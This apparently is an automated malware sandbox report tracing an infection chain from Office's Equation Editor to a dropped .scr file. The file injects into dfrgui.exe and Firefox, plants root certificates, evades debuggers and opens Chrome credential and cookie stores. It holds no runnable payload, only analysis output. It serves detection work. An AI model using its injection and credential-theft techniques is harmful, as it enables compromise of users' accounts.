            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: op55336.scr, 00000005.00000002.351721062.0000000002491000.00000004.00000800.00020000.00000000.sdmp, op55336.scr, 00000005.00000002.351512154.00000000003B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dfrgui.pdb source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395166621.0000000001C60000.00000004.00000001.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395327536.0000000001E30000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000002.847158763.00000000001FE000.00000002.00000001.01000000.00000008.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847139863.00000000001FE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: dfrgui.pdb2D source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395166621.0000000001C60000.00000004.00000001.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395327536.0000000001E30000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: op55336.scr, op55336.scr, 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847379947.0000000002170000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847379947.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.410885708.0000000001E80000.00000004.00000020.00020000.00000000.sdmp
            Source: opp[1].scr.2.drStatic PE information: 0xCA00A32F [Sun May 23 23:50:07 2077 UTC]
            Source: sqlite3.dll.8.drStatic PE information: section name: /4
            Source: sqlite3.dll.8.drStatic PE information: section name: /19
            Source: sqlite3.dll.8.drStatic PE information: section name: /31
            Source: sqlite3.dll.8.drStatic PE information: section name: /45
            Source: sqlite3.dll.8.drStatic PE information: section name: /57
            Source: sqlite3.dll.8.drStatic PE information: section name: /70
            Source: sqlite3.dll.8.drStatic PE information: section name: /81
            Source: sqlite3.dll.8.drStatic PE information: section name: /92
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00678F60 push eax; retf 2_2_00678F61
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00680F60 push eax; retn 0067h2_2_00680F61
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00673B44 push eax; retf 0068h2_2_00673B45
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00688018 push esi; ret 2_2_006889AB
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006701F4 push eax; retf 2_2_006701F5
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0066F8B8 pushfd ; retf 2_2_0066F8B9
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0041B855 pushad ; iretd 6_2_0041B884
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00407936 push eax; iretd 6_2_00407937
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_004191E7 push ecx; ret 6_2_004191E8
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00415A7A push esi; retf 6_2_00415AB4
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040EB41 push 7B0B5DBBh; iretd 6_2_0040EB4A
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0042F3B2 push eax; ret 6_2_0042F3B4
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00419C00 pushad ; retf 6_2_00419C2D
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00415C3E push esp; retf 6_2_00415C8E
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00403640 push eax; ret 6_2_00403642
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0041F75D push eax; iretd 6_2_0041F75E
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EADFA1 push ecx; ret 6_2_00EADFB4
            Source: opp[1].scr.2.drStatic PE information: section name: .text entropy: 7.646009016115731
            Source: op55336.scr.2.drStatic PE information: section name: .text entropy: 7.646009016115731

            Persistence and Installation Behavior

            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opp[1].scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\op55336.scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrMemory allocated: 150000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrMemory allocated: 2490000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrMemory allocated: B20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EF0101 rdtsc 6_2_00EF0101
            Source: C:\Users\user\AppData\Roaming\op55336.scrThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeWindow / User API: threadDelayed 9670Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\dfrgui.exeAPI coverage: 2.2 %
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2592Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scr TID: 3212Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3536Thread sleep count: 289 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3536Thread sleep time: -578000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3684Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3536Thread sleep count: 9670 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3536Thread sleep time: -19340000s >= -30000sJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3416Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe TID: 3596Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe TID: 3596Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe TID: 3596Thread sleep time: -40500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\dfrgui.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\SysWOW64\dfrgui.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E19553 sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,8_2_61E19553
            Source: C:\Users\user\AppData\Roaming\op55336.scr Thread delayed: delay time: 922337203685477
            Source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000002.847199348.0000000000464000.00000004.00000020.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000000.392215507.0000000000464000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t hFHgFS
            Source: C:\Users\user\AppData\Roaming\op55336.scr Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Roaming\op55336.scr Process queried: DebugPort
            Source: C:\Windows\SysWOW64\dfrgui.exe Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\op55336.scr Code function: 6_2_00EF0101 rdtsc 6_2_00EF0101
            Source: C:\Users\user\AppData\Roaming\op55336.scr Code function: 6_2_00418BA3 LdrLoadDll,6_2_00418BA3
            Source: C:\Users\user\AppData\Roaming\op55336.scr Code function: 6_2_00E900EA mov eax, dword ptr fs:[00000030h] 6_2_00E900EA
            Source: C:\Users\user\AppData\Roaming\op55336.scr Code function: 6_2_00E90080 mov ecx, dword ptr fs:[00000030h] 6_2_00E90080
            Source: C:\Users\user\AppData\Roaming\op55336.scr Code function: 6_2_00EB26F8 mov eax, dword ptr fs:[00000030h] 6_2_00EB26F8
            Source: C:\Users\user\AppData\Roaming\op55336.scr Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: opp[1].scr.2.dr, ---.cs Reference to suspicious API methods: _061D_FFFD_FFFD.GetAsyncKeyState(16)
            Source: opp[1].scr.2.dr, -C--.cs Reference to suspicious API methods: _061D_FFFD_FFFD.OpenProcess(_FFFD, iW_005E_06E8_061C, R)
            Source: opp[1].scr.2.dr, j.cs Reference to suspicious API methods: _061D_FFFD_FFFD.MapVirtualKey(_07B8.union.keyboardInput.wVk, 0)
            Source: 5.2.op55336.scr.249f184.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 5.2.op55336.scr.249f184.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtQueryInformationProcess: Direct from: 0x774CFAFA
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtCreateUserProcess: Direct from: 0x774D093E
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtCreateKey: Direct from: 0x774CFB62
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtQuerySystemInformation: Direct from: 0x774D20DE
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtQueryDirectoryFile: Direct from: 0x774CFDBA
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtClose: Direct from: 0x774CFA02
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtWriteVirtualMemory: Direct from: 0x774D213E
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtCreateFile: Direct from: 0x774D00D6
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtSetTimer: Direct from: 0x774D021A
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtOpenFile: Direct from: 0x774CFD86
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtSetInformationThread: Direct from: 0x774E9893
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtOpenKeyEx: Direct from: 0x774CFA4A
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtAllocateVirtualMemory: Direct from: 0x774CFAE2
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtResumeThread: Direct from: 0x774D008D
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtOpenKeyEx: Direct from: 0x774D103A
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtUnmapViewOfSection: Direct from: 0x774CFCA2
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtDelayExecution: Direct from: 0x774CFDA1
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtSetInformationProcess: Direct from: 0x774CFB4A
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtSetInformationThread: Direct from: 0x774CF9CE
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtReadFile: Direct from: 0x774CF915
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtMapViewOfSection: Direct from: 0x774CFC72
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtCreateThreadEx: Direct from: 0x774D08C6
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtDeviceIoControlFile: Direct from: 0x774CF931
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtRequestWaitReplyPort: Direct from: 0x753C6BCE
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtQueryValueKey: Direct from: 0x774CFACA
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtOpenSection: Direct from: 0x774CFDEA
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtProtectVirtualMemory: Direct from: 0x774D005A
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtWriteVirtualMemory: Direct from: 0x774CFE36
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtRequestWaitReplyPort: Direct from: 0x756F8D92
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtQueryVolumeInformationFile: Direct from: 0x774CFFAE
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtNotifyChangeKey: Direct from: 0x774D0F92
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtQueryAttributesFile: Direct from: 0x774CFE7E
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtReadVirtualMemory: Direct from: 0x774CFEB2
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtSetTimer: Direct from: 0x774E98D5
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtSetInformationFile: Direct from: 0x774CFC5A
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe NtQuerySystemInformation: Direct from: 0x774CFDD2
            Source: C:\Users\user\AppData\Roaming\op55336.scr Memory written: C:\Users\user\AppData\Roaming\op55336.scr base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\op55336.scr Section loaded: NULL target: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe protection: execute and read and write
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe Section loaded: NULL target: C:\Users\user\AppData\Roaming\op55336.scr protection: execute and read and write
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe Section loaded: NULL target: C:\Windows\SysWOW64\dfrgui.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\dfrgui.exe Section loaded: NULL target: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe protection: read write
            Source: C:\Windows\SysWOW64\dfrgui.exe Section loaded: NULL target: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\dfrgui.exe Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\dfrgui.exe Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\dfrgui.exe Thread APC queued: target process: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\op55336.scr "C:\Users\user\AppData\Roaming\op55336.scr"
            Source: C:\Users\user\AppData\Roaming\op55336.scr Process created: C:\Users\user\AppData\Roaming\op55336.scr "C:\Users\user\AppData\Roaming\op55336.scr"
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe Process created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"
            Source: C:\Windows\SysWOW64\dfrgui.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
            Source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000000.392233871.0000000000860000.00000002.00000001.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000002.847287088.0000000000860000.00000002.00000001.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000000.427816672.0000000000890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000000.392233871.0000000000860000.00000002.00000001.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000002.847287088.0000000000860000.00000002.00000001.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000000.427816672.0000000000890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: op55336.scr, 00000005.00000000.349485404.0000000000DD2000.00000020.00000001.01000000.00000004.sdmp, dfrgui.exe, 00000008.00000002.847167433.0000000000240000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847604345.00000000027FC000.00000004.10000000.00040000.00000000.sdmp Binary or memory string: Progman
            Source: op55336.scr, 00000005.00000000.349485404.0000000000DD2000.00000020.00000001.01000000.00000004.sdmp, dfrgui.exe, 00000008.00000002.847167433.0000000000240000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847604345.00000000027FC000.00000004.10000000.00040000.00000000.sdmp Binary or memory string: IsProgmanWindow
            Source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000000.392233871.0000000000860000.00000002.00000001.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000002.847287088.0000000000860000.00000002.00000001.00040000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000000.427816672.0000000000890000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: !Progman
            Source: C:\Users\user\AppData\Roaming\op55336.scr Queries volume information: C:\Users\user\AppData\Roaming\op55336.scr VolumeInformation
            Source: C:\Windows\SysWOW64\dfrgui.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u62ln.zip VolumeInformation
            Source: C:\Windows\SysWOW64\dfrgui.exe Code function: 8_2_61E936A0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,8_2_61E936A0
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 6.2.op55336.scr.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.2.op55336.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\dfrgui.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\dfrgui.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\dfrgui.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\dfrgui.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\dfrgui.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
